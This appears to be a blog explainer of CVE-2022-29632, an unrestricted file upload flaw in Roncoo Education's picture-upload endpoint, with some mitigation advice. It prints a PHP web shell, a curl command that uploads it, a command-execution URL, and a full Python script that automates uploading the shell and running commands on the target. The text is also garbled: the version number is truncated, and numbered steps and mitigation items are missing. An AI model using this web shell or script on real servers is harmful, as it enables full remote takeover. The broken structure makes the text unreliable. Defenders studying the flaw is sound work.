---
Introduction
In 2022, security researchers identified a critical vulnerability (CVE-2022-29632) in the popular Roncoo Education platform, specifically affecting version 9... This vulnerability allows an attacker to upload any file they want—including malware or scripts—to the server, which could lead to complete compromise through remote code execution (RCE). In this guide, we'll break down how this bug works, how attackers exploit it, and what you can do to protect your systems.
What is Roncoo Education?
Roncoo Education is a widely-used online education platform, especially popular in Asia. Institutions use it for course management, file uploads, and more. Like many web apps, it lets users upload avatars or documents for their courses.
Vulnerability Type: Arbitrary File Upload
- Component: /course/api/upload/pic
Affected Version: Roncoo Education v9..
- CVE ID: CVE-2022-29632
- Original Reference: Packet Storm Advisory
The problem is rooted in the /course/api/upload/pic endpoint. The server does not properly check the type of the uploaded file or sanitize its name. This means that an attacker can craft a special file—containing malicious code—and upload it, potentially making the server execute that code.
Technical Deep Dive: How the Exploit Works
The normal use of /course/api/upload/pic is to let users upload profile pictures. Typically, servers restrict uploads to safe formats (like JPG or PNG) and store them in locations that can’t execute code. Here, Roncoo Education fails to enforce these rules.
Let's imagine how the backend might look in Java
@PostMapping("/course/api/upload/pic")
public ResponseEntity<?> uploadPic(@RequestParam("file") MultipartFile file) {
String fileName = file.getOriginalFilename();
// Vulnerability: No check on file type or name
File dest = new File("/var/www/html/upload/" + fileName);
file.transferTo(dest);
// Returns path to client
return ResponseEntity.ok("/upload/" + fileName);
}
What's wrong?
For example, a web shell in PHP called shell.php
<?php system($_GET["cmd"]); ?>
Using a tool like curl
curl -F "file=@shell.php" http://target-site.com/course/api/upload/pic
The server doesn’t check file type and stores shell.php in /upload/.
Access the shell via browser
http://target-site.com/upload/shell.php?cmd=whoami
This command runs whoami on the server, displaying the current user.
4. Achieve Remote Code Execution
You can execute any OS command using cmd parameter. This gives full remote code execution, allowing data theft, malware deployment, or complete site takeover.
Below is a simple Python script to automate this attack
import requests
# Target information
upload_url = "http://target-site.com/course/api/upload/pic"
shell_url = "http://target-site.com/upload/shell.php?cmd=whoami"
# Upload PHP web shell
files = {
'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(upload_url, files=files)
print('[+] Upload response:', response.text)
# Access the web shell
result = requests.get(shell_url)
print('[+] Shell result:', result.text)
*Note: This code is for educational purposes only. Never use it on systems you don't own or have permission to test.*
Sanitize Content: Use libraries to check file contents for expected format.
5. Apply Patches: Check the official GitHub or vendor’s site for updated versions.
Example Java fix
String contentType = file.getContentType();
if (!contentType.equals("image/png") && !contentType.equals("image/jpeg")) {
throw new IllegalArgumentException("Invalid file type!");
}
References & Further Reading
- CVE-2022-29632 at NVD
- Packet Storm Disclosure
- Roncoo Education GitHub
- OWASP Unrestricted File Upload
Final Notes
Exploits like CVE-2022-29632 show why strict input validation and file handling are critical for web applications. If you’re running Roncoo Education or any similar software, audit your file upload endpoints now—you don't want your platform to be the next headline.
*By simplifying this, we've made a complex and dangerous vulnerability easy to understand. Always test and patch your software, and help keep the web a safer place.*
Timeline
Published on: 05/26/2022 20:15:00 UTC
Last modified on: 06/08/2022 15:54:00 UTC